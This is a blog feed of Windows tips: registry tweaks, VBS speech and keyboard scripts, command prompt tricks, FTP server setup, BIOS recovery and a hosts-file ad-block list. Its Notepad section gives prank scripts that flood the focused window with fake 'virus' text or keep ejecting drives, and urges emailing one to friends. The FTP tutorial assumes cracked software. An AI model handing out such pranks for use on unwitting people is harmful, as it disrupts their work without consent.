ITGuide888

Disable USB ports on Windows PC via Registry

noreply@blogger.com (Agung Prasetiawan,) — Sun, 15 Jan 2017 09:39:00 +0000

Disable USB ports on Windows PC via Registry

With this trick, you can disable access to your USB(Universal Serial Bus) ports on your Windows based PC to prevent people from taking out data without permission or spreading viruses through the use of USB (pen and flash) drives.

To use this trick to disable USB ports, follow the steps given below:-

    Click on Start.
    Click on Run. If you cannot find RUN, type it in the search box.
    Type "regedit" without quotes. This will launch the Registry Editor.
    Navigate to HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\usbstor.
    In the work area, double click on Start.
    In the Value Data box, enter 4.
    Click on OK.
    Close Registry Editor and refresh your desktop.
    To re-enable access to your USB ports, enter 3 in the Value Data box in Step 6.

Disable access to USB ports on your PC using Registry Editor

Try it yourself to make your PC invulnerable from data theft and malware which spread through USB ports. This works on Windows 10, Windows 8, Windows 8.1, Windows 7 and Windows XP.

Note: This trick also disables access to your USB connected peripheral devices. So, do not use it if you have USB connected keyboard and mouse.

Credits : http://www.tweakandtrick.com/2010/07/disable-access-to-usb-ports-in-your-pc.html

Cool Keyboard Tricks (Windows) : Make a Disco

noreply@blogger.com (Agung Prasetiawan,) — Sat, 14 Jan 2017 09:36:00 +0000

Cool Keyboard Tricks (Windows) : Make a Disco

Keyboards usually have small LEDs which indicate whether different types of locks are activated or not. Here is a trick to use the lights of your keyboard in a more creative manner in Windows.

This trick uses a simple Visual Basic Script which when activated makes your Scroll lock, Caps lock and Num lock LEDs flash in a cool rhythmic way which gives the perception of a live disco on your keyboard.

Keyboard tricks

To make your own live disco, follow the steps given below:-

1. Open Notepad.
2. Copy paste the exact code given below:-

    Set wshShell =wscript.CreateObject("WScript.Shell")
    do
    wscript.sleep 100
    wshshell.sendkeys "{CAPSLOCK}"
    wshshell.sendkeys "{NUMLOCK}"
    wshshell.sendkeys "{SCROLLLOCK}"
    loop

3. Save the file as Disco.vbs or "*.vbs".

Cool Keyboard Tricks

Double click on the Saved file to see the LED lights on your keyboard go crazy and make your own cool disco.

This trick has been tested on Windows XP, Windows Vista, Windows 7 and Windows 8 and found to be working perfectly.

You can disable the keyboard disco by starting Task Manager and ending the wscript.exe process.

Credits : http://www.tweakandtrick.com/2010/12/cool-keyboard-tricks-windows-make-disco.html

Use Keyboard as Mouse [How To]

noreply@blogger.com (Agung Prasetiawan,) — Fri, 13 Jan 2017 09:38:00 +0000

Use Keyboard as Mouse [How To]

If your mouse is not working and you don't wish to wait till you get a new mouse, you would definitely like to know how you can use your keyboard as mouse. It is easy to use your mouse as keyboard in Windows using the On Screen Keyboard utility, but it is also possible to do the reverse.

Keyboard Mouse

All you need to do is:

Windows XP Users:-

    Go to Control Panel.
    Then click on Switch to Classic View.
    Then Click on Accessibility Options.
    Then Click on the Mouse Tab.
    Select Use MouseKeys.
    Click on OK.
    Then activate NumberLock (by pressing the NumLk key).
    You should hear a beep sound.
    Now you can control the mouse pointer using the arrow keys on the numeric keypad.

use keyboard as mouse

Windows 8, Windows 7 and Vista Users:

    Open Ease of Access Center by clicking the Start button , clicking Control Panel, clicking Ease of Access, and then clicking Ease of Access Center.
    Click Make the mouse easier to use.
    Under Control the mouse with the keyboard, select the Turn on Mouse Keys check box.

You can also increase the acceleration and speed of your mouse movements according to your needs.

You can alternately press the Alt+Shift+Num Lock combination to instantly activate Mouse keys.

Laptop Keyboard Mouse

For laptops, this will only work if your keyboard has a numeric keypad or alternate keys which you can enable by pressing the Number Lock or the Function key.

On my laptop, number 6 key of the numeric keypad moves the mouse pointer left, number 4 key moves the mouse pointer right, number 2 key moves it down, number 8 key moves the mouse pointer up, number 5 and + key serve as right click while the number 0 key works as left click.

Credits : http://www.tweakandtrick.com/2010/06/use-your-keyboard-as-mouse.html

Make your Computer Welcome You

noreply@blogger.com (Agung Prasetiawan,) — Thu, 12 Jan 2017 09:35:00 +0000

Make your Computer Welcome You

Do you watch movies? Have you always loved the way how Computers in movies welcome their users by calling out their names? I bet that you too would want to know how you can achieve similar results on your PC and have a computer said welcome.

Then you are at the right place, this article describes exactly how you can make your computer welcome you like this.

With this trick, you can make your Computer welcome you in its computerized voice. You can make your Windows based computer say "Welcome to your PC, Username."

Make Windows Greet you with a Custom Voice Message at Startup

To use this trick, follow the instructions given below:-

    Click on Start. Navigate to All Programs, Accessories and Notepad.
    Copy and paste the exact code given below.

    Dim speaks, speech
    speaks="Welcome to your PC, Username"
    Set speech=CreateObject("sapi.spvoice")
    speech.Speak speaks

     3. Replace Username with your own name.
     4. Click on File Menu, Save As, select All Types in Save as Type option, and save the file as Welcome.vbs or "*.vbs".
     5. Copy the saved file.
     6. Navigate to C:\Documents and Settings\All Users\Start Menu\Programs\Startup (in Windows XP) and to C:\Users\ {User-Name}\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup (in Windows 10, Windows 8, Windows 7 and Windows Vista) if C: is your System drive. AppData is a hidden folder. So, you will need to select showing hidden folders in Folder options to locate it. If you have trouble locating the startup folder, press Windows key+R and type shell:startup in the Run dialog box and press Enter. The startup folder will open.
     7. Paste the file.

Make your Computer Welcome you at startup

Now when the next time you start your computer, Windows will welcome you in its own computerized voice.

Note: For best results, it is recommended to change sound scheme to No Sounds.
You can change the sound scheme to No Sounds by following the steps given below:-

    Go to Control Panel.
    Then click on Switch to Classic View.
    Then Click on Sounds and Audio Devices.
    Then Click on the Sounds Tab.
    Select No Sounds from the Sound Scheme option.
    If you wish to save your Previous Sound Scheme, you can save it by clicking Yes in the popup menu.
    Click on OK.

Change Sound Scheme to No Sounds

Try it yourself to see how it works. In my personal opinion, this is an excellent trick. Whenever I start my PC in front of anybody and the PC welcomes me, the fellow is left wondering how brilliant a computer do I have.

Credits : http://www.tweakandtrick.com/2010/07/make-your-computer-welcome-you.html

Make your Computer Talk with VBScript

noreply@blogger.com (Agung Prasetiawan,) — Wed, 11 Jan 2017 09:32:00 +0000

Make your Computer Talk with VBScript

Have you ever wondered how can you make your computer speak whatever you input to it like in the movies? Would it not be fun? If only it was possible! Rejoice, because now it is possible. Well, if you wish to know how to do this, then you have come to the right place. With this trick, you can create a script in Windows which will make your computer speak whatever you input to it.

To create one such talk script, follow the steps given below:-

Steps

    Open Notepad.
    Copy and paste the exact code given below.

              Dim Message, Speak
              Message=InputBox("Enter text","Speak")
              Set Speak=CreateObject("sapi.spvoice")
              Speak.Speak Message

    3. Click on File Menu, Save As, select All Types in Save as Type option, and save the file as Speak.vbs or "*.vbs".
    4. Double click on the saved file, a window will open like the one in the image. Enter some text in enter text column and click OK.

Now your Computer will speak / talk what you typed in Step 4. Try it yourself.

Windows Compatibility: This VBS file can be executed on all versions of Windows including Windows XP, Windows Vista, Windows 7, Windows 8, Windows 8.1 and Windows 10.

Personal Experience: I personally showed this trick to many of my friends and they were literally left awestruck. You too can impress your friends by making your PC talk and be the computer wiz.

Credits : http://www.tweakandtrick.com/2010/06/make-talk-it-script-in-windows-xp.html

Command Prompt Tricks, Hacks & Codes

noreply@blogger.com (Agung Prasetiawan,) — Tue, 10 Jan 2017 09:31:00 +0000

1-Watch ASCII version of the Star Wars Episode IV movie
Surprised yet? You can watch an ASCII version of the full Star Wars Episode IV Movie right in your command prompt window. Just open command prompt, type a small code and the movie will start playing immediately.

2- Create Matrix falling code effect
Have you watched “The Matrix”? Of course, you have. Then, you already know what I am talking about. In case you still don't know what I mean

3- Make Folders that you cannot delete
Are you tired of accidentally deleting important folders? Well, if you are, you can learn how to make undeletable folders

4- Shutdown your computer giving a funny reason
What if your computer shuts down saying that it is tired and doesn't want to work anymore? It would be fun, wouldn't it?

5- Know your IP address, DNS Server's address and a lot more about your Internet Connection
Command Prompt can even let you know your IP address. Just type ipconfig/ all in the command prompt and press Enter. Along with your IP address and DNS servers, command prompt will also return a ton of information like your host name, primary DNS suffix, node type, whether IP Routing ,Wins Proxy, and DHCP are enabled, your network adapter's description, your physical (MAC) address etc .

6- Know if your neighbours are stealing your WiFi connection
command prompt codes
Command Prompt can let you know if someone is connected to your Local Area Connection and using it. Just follow the steps:-
1) Open your browser and visit http://192.168.1.1 or http://192.168.0.1 depending on your router.
2) Find the tab that mentions “Attached Devices” or something similar.
3) Find the computer name, IP address and MAC Address (sometimes called Physical Address or Hardware Address) of your computer using the previous trick.
4 )Compare it with those displayed by your router in Step 2. If you notice some strange devices, then your neighbour has been sneaking in on your internet connection and it is best to add a password.

7- Know if someone is hacking your computer/ Trace a Hacker
Command Prompt hacks
Want to know if someone is hacking your computer? Command Prompt can help you find if someone you don't know is connected to your computer stealing private data. Just execute netstat -a and the command prompt will return a list of computers that your computer is connected to. In the results returned, Proto column gives the type of data transmission taking place (TCP or UDP) , Local address column gives the port with which your computer is connected to an external computer and the Foreign Address column gives the external computer you are connected to along with the port being used for the connection. State gives the state of the connection (whether a connection is actually established, or waiting for transmission or is “Timed Out”).

These tricks work on Windows 10, Windows 8.1, Windows 8, Windows 7, Windows Vista, Windows XP and all previous versions of Windows.

Credits : http://www.tweakandtrick.com/2011/09/command-prompt-tricks-hacks-codes.html

Notepad Tricks: Cool Notepad tricks for Windows

noreply@blogger.com (Agung Prasetiawan,) — Mon, 09 Jan 2017 09:02:00 +0000

Notepad, the text editor that comes bundled in Windows is an excellent tool for text editing. But that is not the only thing for which notepad is famous. It is also famous for its tricks and hacks. Here is a roundup of some of the best and coolest tricks that you can try using Notepad.

Matrix Falling Code Effect - Notepad CMD (.BAT) Tricks

Inspired by the movie Matrix, this falling code trick is extremely popular on social networking websites. Copy and paste the code given below in Notepad and save the file as "Matrix.bat" or *.bat.

@echo off
color 02
:tricks
echo %random%%random%%random%%random%%random%%random%%random%%random%
goto tricks

Upon running the bat file, you will see the "Matrix falling code" effect.

Make Your Keyboard Type (Any) Message Continuously-VBS Trick

This VBS trick can make any of your friend's keyboard type any message continuously. Open Notepad, copy the code given below and save the file as Tricks.vbs or *.vbs. You will need to restart your computer to stop this. Try this after closing all important programs.

Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "This is a Virus. You have been infected."
loop

Send this file to your friends as an email attachment to see the fun.

Create a Harmless Funny Virus with Notepad-Continuously eject CD/DVD drives

This VBS trick will create a code which will continuously eject all your connected Optical drives. If you put them back in, it will pop them out again. Copy this code and paste it in Notepad as Virus.vbs or *.vbs.

Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop

Double click to open this file and you will be impressed by this awesome trick.

Make a Personal Diary(Log) with Notepad (Easter Eggs)

You can use this trick to create a personal log with Notepad which will automatically include the current date and time before your note. To do so, open Notepad and type .LOG in capital letters and press Enter. Save the file. Now, every time you open this file, notepad will automatically insert the current time and date before the note. Just enter your note and save the file each time after making an entry.

All these Notepad tricks are totally harmless and would not harm your PC in any way. To close any of the VBS trick given, open task manager and close the wscript.exe process. These tricks work on Windows 10, Windows 8.1, Windows 8, Windows 7, Windows Vista and Windows XP

BulletProof FTP Server Tutorial

noreply@blogger.com (Agung Prasetiawan,) — Tue, 03 Jan 2017 07:40:00 +0000

thanks to someone for this tut.

Configuring your Bulletproof FTP Server Tutorial

I am not sure where I found this tutorial, Its been a whileIt might even have been here... ..So if it is one of yours, my hat goes off to you once again....

After reading the excellent tutorial on "Creating an FTP" that Norway posted

(I would suggest reading and following his tutorial first, then following up with this one)

I thought that perhaps this tutorial might be pretty helpful for those interested in knowing how to configure their Bulletproof FTP Server that don't already know how... Here's how to get started

This is for the BulletProof FTP Server 2.10. However, It should work fine on most following versions as well.

I'm assuming you have it installed and cracked.

Basics
1. Start the program.
2. Click on Setup > Main > General from the pull-down menu.
3. Enter your server name into the 'Server Name' box. Under Connection set the Max number of users" to any number. This is the limit as to how many users can be on your sever at any time.
4. Click on the 'options' tab of that same panel (on the side)
5. Look at the bottom, under IP Options. Put a check in the box Refuse Multiple Connections from the same IP. This will prevent one person from blocking your FTP to others.
6. Also put a check in the 'Blocked Banned IP (instead of notifying client). VERY IMPORTANT! If somebody decides to 'Hammer' (attempt to login numerous times VERY quickly) your server/computer may CRASH if you don't enable this.
7. Click on the 'advanced' tab
8. At the bottom again look at the 'hammering area'
9. Enable 'anti-hammer' and 'do not reply to people hammering' Set it for the following: Block IP 120 min if 5 connections in 60 sec. You can set this at whatever you want to but that is pretty much a standard Click 'OK'

Adding Users
11. Setup > User accounts form pull-down.
12. Right click in the empty 'User Accounts' area on the right: choose 'Add'
13. Enter account name. (ie: logon name)
14. In the 'Access rights' box right click: choose Add.
15. Browse until you find the directory (folder) you want to share. In the right column you will see a bunch of checkboxes. Put a check in the following ones: Read, Write, Append, Make, List, and +Subdirs. Press 'select'.
16. Enter a password for your new FTP account.
17. Click on 'Miscellaneous' in the left column. Make sure 'Enable Account' is selected. Enable 'Max Number of Users' set it at a number other than zero. 1 for a personal account and more that one for a group account. Enable 'Max. no. of connects per IP' set it at 1

18. Under 'Files' enable 'show relative path' this is a security issue. A FTP client will now not be able to see the ENTIRE path of the FTP. It will only see the path from the main directory. Hide hidden flies as well.
Put a tick in both of these.

Advanced:
You don't need to do any of this stuff, but It will help tweak your server and help you maintain order on it. All of the following will be broken down into small little areas that will tell you how to do one thing at a time.

Changing the Port
The default port is always 21, but you can change this. Many ISPs will routinely do a scan of its own users to find a ftp server, also when people scan for pubs they may scan your IP, thus finding your ftp server. If you do decide to change it many suggest that you make the port over 10,000.
1. Setup > Main > General
2. In the 'Connection' Area is a setting labeled 'Listen on Port Number:'
3. Make it any number you want. That will be your port number.
4. Click 'OK'

Making an 'Upload Only' or 'Download Only' ftp server.
This is for the entire SERVER, not just a user.
1. Setup > Main > Advanced
2. In the advanced window you will have the following options: uploads and downloads, downloads only, and uploads only. By default upload and download will be checked. Change it to whatever you want.
3. Click 'OK

While you are running your server, usually you will end up spending more time at your computer than you normally do. Don't be afraid to ban IP's. Remember, on your FTP you do as you want.

When you are online you must also select the open server button next to the on-line button which is the on-line Button

You also have to use the actual Numbered ip Address ie: 66.250.216.67

Or even Better yet, get a no-ip.com address

Broken IE, How to fix it

noreply@blogger.com (Agung Prasetiawan,) — Mon, 02 Jan 2017 07:39:00 +0000

So one of your friends, not you of course, has managed to nuke Internet Explorer and they are unsure how they did it. Youve eliminated the possibility of viruses and adware, so this just leaves you and a broken IE. Before you begin to even consider running a repair install of the OS, lets try to do a repair on IE instead.

THE REPAIR PROCESS

Start the Registry Editor by typing regedit from the Run box. Go to HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Active Setup \ Installed Components \ {89820200-ECBD-11cf-8B85-00AA005B4383} and then right-click the IsInstalled value. Click Modify. From there, you will change the value from 1 to 0. All right, go ahead and close the editor and reinstall IE from this location. /http://www.microsoft.com/windows/ie/default.mspx

IF SOMETHING GOES WRONG

If messing with the registry and something goes horribly wrong, you can use Last Known Good Configuration (F8 Safe Mode) or a Restore Point to get back to where you were before, with your settings. Then you can try again, this time taking care to watch the portion of the registry you are changing. Most people who have troubles with this end up changing the wrong registry key.

Hope this tut helps some members.

Boot Winxp Fast

noreply@blogger.com (Agung Prasetiawan,) — Sun, 01 Jan 2017 07:33:00 +0000

Boot Winxp Fast

Follow the following steps

1. Open notepad.exe, type "del c:\windows\prefetch\ntosboot-*.* /q" (without the quotes) & save as "ntosboot.bat" in c:\
2. From the Start menu, select "Run..." & type "gpedit.msc".
3. Double click "Windows Settings" under "Computer Configuration" and double click again on "Shutdown" in the right window.
4. In the new window, click "add", "Browse", locate your "ntosboot.bat" file & click "Open".
5. Click "OK", "Apply" & "OK" once again to exit.
6. From the Start menu, select "Run..." & type "devmgmt.msc".
7. Double click on "IDE ATA/ATAPI controllers"
8. Right click on "Primary IDE Channel" and select "Properties".
9. Select the "Advanced Settings" tab then on the device or 1 that doesn't have 'device type' greyed out select 'none' instead of 'autodetect' & click "OK".
10. Right click on "Secondary IDE channel", select "Properties" and repeat step 9.
11. Reboot your computer.

Boot Block Recovery For Free

noreply@blogger.com (Agung Prasetiawan,) — Sun, 01 Jan 2017 07:32:00 +0000

Boot Block Recovery For Free

You don't need to pay a measly sum of dollars just to recover from a boot block mode. Here it is folks:

AWARD Bootblock recovery:

That shorting trick should work if the boot block code is not corrupted, and it should not be if /sb switch is used when flashing the bios (instead of /wb switch).

The 2 pins to short to force a checksum error varies from chip to chip. But these are usually the highest-numbered address pins (A10 and above).

These are the pins used by the system to read the System BIOS (original.bin for award v6), calculate the ROM checksum and see if it's valid before decompressing it into memory, and subsequently allow Bootblock POST to pass control over to the System BIOS.

You just have to fool the system into believing that the System BIOS is corrupt. This you do by giving your system a hard time reading the System BIOS by shorting the 2 high address pins. And when it could not read the System BIOS properly, ROM Checksum Error is detected "so to speak" and Bootblock recovery is activated.

Sometimes, any combination of the high address pins won't work to force a checksum error in some chips, like my Winbond W49F002U. But shorting the #WE pin with the highest-numbered address pin (A17) worked for this chip. You just have to be experimentative if you're not comfortable with "hot flashing" or "replacement BIOS".

But to avoid further damage to your chip if you're not sure which are the correct pins to short, measure the potential between the 2 pins by a voltmeter while the system is on. If the voltage reading is zero (or no potential at all), it is safe to short these pins.

But do not short the pins while the system is on. Instead, power down then do the short, then power up while still shorting. And as soon as you hear 3 beeps (1 long, 2 short), remove the short at once so that automatic reflashing from Drive A can proceed without errors (assuming you had autoexec.bat in it).

About how to do the shorting, the tip of a screwdriver would do. But with such minute pins on the PLCC chip, I'm pretty comfortable doing it with the tip of my multi-tester or voltmeter probe. Short the pins at the point where they come out of the chip.

AMIBIOS Recovery bootblock:
1. Copy a known working BIOS image for your board to a floppy and rename it to AMIBOOT.ROM.
2. Insert the floppy in your system's floppydrive.
3. Power on the system while holding CTRL+Home keys. Release the keys when you hear a beep and/or see the floppy light coming on.
4 . Just wait until you hear 4 beeps. When 4 beeps are heard the reprogramming of the System Block BIOS went succesfull, so then you may restart your system.

Some alternative keys that can be used to force BIOS update (only the System Block will be updated so it's quite safe):
CTRL+Home= restore missing code into system block and clear CMOS when programming went ok.
CTRL+Page Up= restore missing code into system block and clear CMOS or DMI when programming went ok.
CTRL+Page Down= restore missing code into system block and do not clear CMOS and DMI area when programming went ok
Btw: the alternative keys work only with AMIBIOS 7 or higher (so for example an AMI 6.26 BIOS can be only recovered by using CTRL+Home keys).
Boot Block Recovery for FREE

************************************************
BLACKOUT Flashing
*************************************************

Recovering a Corrupt AMI BIOS chip
With motherboards that use BOOT BLOCK BIOS it is possible to recover a corrupted BIOS because the BOOT BLOCK section of the BIOS, which is responsible for booting the computer remains unmodified. When an AMI BIOS becomes corrupt the system will appear to start, but nothing will appear on the screen, the floppy drive light will come on and the system will access the floppy drive repeatedly. If your motherboard has an ISA slot and you have an old ISA video card lying around, put the ISA video card in your system and connect the monitor. The BOOT BLOCK section of the BIOS only supports ISA video cards, so if you do not have an ISA video card or your motherboard does not have ISA slots, you will have to restore your BIOS blind, with no monitor to show you whats going on.

AMI has integrated a recovery routine into the BOOT BLOCK of the BIOS, which in the event the BIOS becomes corrupt can be used to restore the BIOS to a working state. The routine is called when the SYSTEM BLOCK of the BIOS is empty. The restore routine will access the floppy drive looking for a BIOS file names AMIBOOT.ROM, this is why the floppy drive light comes on and the drive spins. If the file is found it is loaded into the SYSTEM BLOCK of the BIOS to replace the missing information. To restore your BIOS simply copy a working BIOS file to a floppy diskette and rename it AMIBOOT.ROM, then insert it into the computer while the power is on. The diskette does not need to be bootable or contain a flash utility. After about four minutes the system will beep four times. Remove the floppy diskette from the drive and reboot the computer. The BIOS should now be restored.

Recovering a Corrupt AWARD BIOS
With AWARD BIOS the process is similar but still a bit different. To recover an AWARD BIOS you will need to create a floppy diskette with a working BIOS file in .BIN format, an AWARD flash utility and an AUTOEXEC.BAT file. AWARD BIOS will not automatically restore the BIOS information to the SYSTEM BLOCK for this reason you will need to add the commands necessary to flash the BIOS in the AUTOEXEC.BAT file. The system will run the AUTOEXE.BAT file, which will in turn flash the BIOS. This is fairly easy. Here are the steps you need to take.

· Create a bootable floppy diskette
· Copy the BIOS file and flash utility to the diskette
· Create an text file with any standard text editor and add the following lines

@ECHO OFF
FLASH763 BIOSFILE.BIN /py

In the above example I am assuming that you are using the FLASH763.EXE flash utility. You will need to replace the FLASH763 with the name of whatever flash utility you are using, and replace the BIOSFILE.BIN with the name of the BIOS file you are using. You will also need to change the /py to whatever the command is for your flash utility to automatically program the BIOS without user intervention. If you do not know the command to automatically flash your BIOS type the name of the flash utility with a space and then /? to display the utilitys help screen. The help screen should pecify the command switch to automatically flash your BIOS. If you are using the FLASH763.EXE utility then the switch to automatically flash your BIOS is /py.

Block Adservers

noreply@blogger.com (Agung Prasetiawan,) — Sat, 31 Dec 2016 07:31:00 +0000

Block Adservers

f you wanna remove those nasty ads from the pages which waste lot of time and bandwidth then here is something for you I belive it will help you a lot

how it works
It's possible to set up a name server as authoritative for any domain you choose, allowing you to specify the DNS records for that domain. You can also configure most computers to be sort of mini-nameservers for themselves, so that they check their own DNS records before asking a nameserver. Either way, you get to say what hostname points to what IP address. If you haven't guessed already, the way you block ads it to provide bogus information about the domains we don't want to see - ie, all those servers out there that dedicate their existence to spewing out banner ads.

The hosts file

Probably the most common way people block ads like this is with something called the "hosts file". The hosts file is a simple list of hostnames and their corresponding IP addresses, which your computer looks at every time you try and contact a previously unknown hostname. If it finds an entry for the computer you're trying to reach, it sets the IP address for that computer to be whatever's in the hosts file.

127.0.0.1 is a special IP address which, to a computer, always means that computer. Any time a machine sends a network request to 127.0.0.1, it is talking to itself. This is very useful when it comes to blocking ads, because all we have to do is specify the IP address of any ad server to be 127.0.0.1. And to do that, all we have to do is edit the hosts file. What will happen then is something like this:

1. you visit a web page
2. the web page contains a banner ad stored on the server "ads.example.com"
3. your computer says "ads.example.com? never heard of it. wait a second, let's see if I've got the number on me..."
4. your computer finds its hosts file and checks to see if ads.example.com is listed
5. it finds the hostname, which points to 127.0.0.1
6. "great", says the computer, and sends off a request to 127.0.0.1 for the banner ad that's supposed to be on the page
7. "oh", says the computer, and fails to show anything because it just sent a request to itself for a banner ad

Where's my hosts file?

    * Windows 95 / 98 / ME: C:\Windows (I think)
    * Windows NT: C:\WinNT\hosts
    * Windows 2000: C:\WinNT\system32\drivers\etc\
    * Windows XP: C:\Windows\System32\drivers\etc
    * FreeBSD / Linux / Mac OS X / Unixish operating systems: /etc/hosts
    * Classic Mac OS: please read this helpful information submitted by David "iNerd" B
    * Mac OS 9: Marcia Skidmore sent in details that hopefully explain what you need to know

The format of the hosts file is very simple - IP address, whitespace, then a list of hostnames (except for older Macs; please see above). However, you don't need to know anything about the format if you don't want to as you can just view the list hosts file.

Of course, that's not the only way to use the list, but it's probably the most simple for most people.

here is the hosts list which are serving you the ads just append it to your hosts file and enjoy ad free surfing makes things faster. if you want ad from certain site then just remove it from the list below.

QUOTE
127.0.0.1 007arcadegames.com
127.0.0.1 101order.com
127.0.0.1 123banners.com
127.0.0.1 123found.com
127.0.0.1 180searchassistant.com
127.0.0.1 180solutions.com
127.0.0.1 247media.com
127.0.0.1 247realmedia.com
127.0.0.1 24pm-affiliation.com
127.0.0.1 2log.com
127.0.0.1 2o7.net
127.0.0.1 4affiliate.net
127.0.0.1 4d5.net
127.0.0.1 7adpower.com
127.0.0.1 911promotion.com
127.0.0.1 a-counter.kiev.ua
127.0.0.1 a.consumer.net
127.0.0.1 a.gismeteo.ru
127.0.0.1 a.mktw.net
127.0.0.1 a.r.tv.com
127.0.0.1 a.xanga.com
127.0.0.1 a32.g.a.yimg.com
127.0.0.1 aaddzz.com
127.0.0.1 abcnews.footprint.net
127.0.0.1 abetterinternet.com
127.0.0.1 abz.com
127.0.0.1 ac.rnm.ca
127.0.0.1 accelerator-media.com
127.0.0.1 accipiter.speedera.net
127.0.0.1 action.ientry.net
127.0.0.1 actionsplash.com
127.0.0.1 actualdeals.com
127.0.0.1 ad-annex.com
127.0.0.1 ad-flow.com
127.0.0.1 ad-images.suntimes.com
127.0.0.1 ad-logics.com
127.0.0.1 ad-rotator.com
127.0.0.1 ad-server.gulasidorna.se
127.0.0.1 ad-souk.com
127.0.0.1 ad-space.net
127.0.0.1 ad-tech.com
127.0.0.1 ad-universe.com
127.0.0.1 ad-up.com
127.0.0.1 ad.100.tbn.ru
127.0.0.1 ad.37.com
127.0.0.1 ad.4web.cz
127.0.0.1 ad.71i.de
127.0.0.1 ad.a8.net
127.0.0.1 ad.abcnews.com
127.0.0.1 ad.abctv.com
127.0.0.1 ad.about.com
127.0.0.1 ad.aboutit.de
127.0.0.1 ad.aboutwebservices.com
127.0.0.1 ad.aftonbladet.se
127.0.0.1 ad.allstar.cz
127.0.0.1 ad.altervista.org
127.0.0.1 ad.asap-asp.net
127.0.0.1 ad.bondage.com
127.0.0.1 ad.centrum.cz
127.0.0.1 ad.cgi.cz
127.0.0.1 ad.chip.de
127.0.0.1 ad.clix.pt
127.0.0.1 ad.digitallook.com
127.0.0.1 ad.directconnect.se
127.0.0.1 ad.disney.go.com
127.0.0.1 ad.domainfactory.de
127.0.0.1 ad.dvdforum.nu
127.0.0.1 ad.e-kolay.net
127.0.0.1 ad.e-not.net
127.0.0.1 ad.eurosport.com
127.0.0.1 ad.ezpeer.com
127.0.0.1 ad.fido.net
127.0.0.1 ad.fragzone.se
127.0.0.1 ad.free6.com
127.0.0.1 ad.grafika.cz
127.0.0.1 ad.harmony-central.com
127.0.0.1 ad.hbv.de
127.0.0.1 ad.howstuffworks.com
127.0.0.1 ad.hyena.cz
127.0.0.1 ad.iinfo.cz
127.0.0.1 ad.ilse.nl
127.0.0.1 ad.img.yahoo.co.kr
127.0.0.1 ad.infoseek.com
127.0.0.1 ad.investopedia.com
127.0.0.1 ad.ir.ru
127.0.0.1 ad.itmedia.co.jp
127.0.0.1 ad.jetsoftware.com
127.0.0.1 ad.keenspace.com
127.0.0.1 ad.krutilka.ru
127.0.0.1 ad.leadcrunch.com
127.0.0.1 ad.linx.cz
127.0.0.1 ad.liveinternet.ru
127.0.0.1 ad.lupa.cz
127.0.0.1 ad.mediastorm.hu
127.0.0.1 ad.mgd.de
127.0.0.1 ad.moscowtimes.ru
127.0.0.1 ad.musicmatch.com
127.0.0.1 ad.mwizard.net
127.0.0.1 ad.nachtagenten.de
127.0.0.1 ad.nozonedata.com
127.0.0.1 ad.nrk.no
127.0.0.1 ad.pbs.bb.ru
127.0.0.1 ad.playground.ru
127.0.0.1 ad.preferances.com
127.0.0.1 ad.rambler.ru
127.0.0.1 ad.reunion.com
127.0.0.1 ad.seznam.cz
127.0.0.1 ad.simgames.net
127.0.0.1 ad.spieletips.de
127.0.0.1 ad.suprnova.org
127.0.0.1 ad.surfsecret.com
127.0.0.1 ad.sweclockers.com
127.0.0.1 ad.t2t2.com
127.0.0.1 ad.tbn.ru
127.0.0.1 ad.tiscali.com
127.0.0.1 ad.tisnet.net.tw
127.0.0.1 ad.tomshardware.com
127.0.0.1 ad.top50.to
127.0.0.1 ad.tv2.no
127.0.0.1 ad.tweakpc.de
127.0.0.1 ad.uk.tangozebra.com
127.0.0.1 ad.uol.com.br
127.0.0.1 ad.usatoday.com
127.0.0.1 ad.way.cz
127.0.0.1 ad.wz.cz
127.0.0.1 ad.yadro.ru
127.0.0.1 ad.yieldmanager.com
127.0.0.1 ad.yourmedia.com
127.0.0.1 ad01.mediacorpsingapore.com
127.0.0.1 ad1.emediate.dk
127.0.0.1 ad1.gamezone.com
127.0.0.1 ad1.hardware.no
127.0.0.1 ad1.kde.cz
127.0.0.1 ad1.lbe.ru
127.0.0.1 ad1.outpost.com
127.0.0.1 ad1.zendmedia.com
127.0.0.1 ad2.atlas.cz
127.0.0.1 ad2.bb.ru
127.0.0.1 ad2.insitemedia.hu
127.0.0.1 ad2.lbe.ru
127.0.0.1 ad2.linx.cz
127.0.0.1 ad2.linxcz.cz
127.0.0.1 ad2.lupa.cz
127.0.0.1 ad2.mamma.com
127.0.0.1 ad2.seznam.cz
127.0.0.1 ad2.tisnet.net.tw
127.0.0.1 ad3.tisnet.net.tw
127.0.0.1 ad4.atlas.cz
127.0.0.1 ad4.tisnet.net.tw
127.0.0.1 ad41.atlas.cz
127.0.0.1 ad4ex.com
127.0.0.1 adbanner.ro
127.0.0.1 adboost.de.vu
127.0.0.1 adbot.com
127.0.0.1 adbot.theonion.com
127.0.0.1 adbrite.com
127.0.0.1 adbureau.net
127.0.0.1 adbutler.com
127.0.0.1 adbutler.de
127.0.0.1 adcell.de
127.0.0.1 adcenter.mdf.se
127.0.0.1 adcenter.net
127.0.0.1 adcentriconline.com
127.0.0.1 adcept.net
127.0.0.1 adclick.com
127.0.0.1 adclick.gamespy.com
127.0.0.1 adclick.mint.se
127.0.0.1 adclick.ro
127.0.0.1 adclient.rottentomatoes.com
127.0.0.1 adclient1.tucows.com
127.0.0.1 adcomplete.com
127.0.0.1 adcontent.gamespy.com
127.0.0.1 adcontroller.unicast.com
127.0.0.1 adcreative.tribuneinteractive.com
127.0.0.1 adcycle.com
127.0.0.1 adcycle.icpeurope.net
127.0.0.1 addcontrol.net
127.0.0.1 addesktop.com
127.0.0.1 addfreestats.com
127.0.0.1 addme.com
127.0.0.1 addynamix.com
127.0.0.1 adengage.com
127.0.0.1 adext.inkclub.com
127.0.0.1 adfarm.mediaplex.com
127.0.0.1 adfiles.api.no
127.0.0.1 adflight.com
127.0.0.1 adfly.com
127.0.0.1 adhostcenter.com
127.0.0.1 adi.mainichi.co.jp
127.0.0.1 adimage.asiaone.com.sg
127.0.0.1 adimages.been.com
127.0.0.1 adimages.carsoup.com
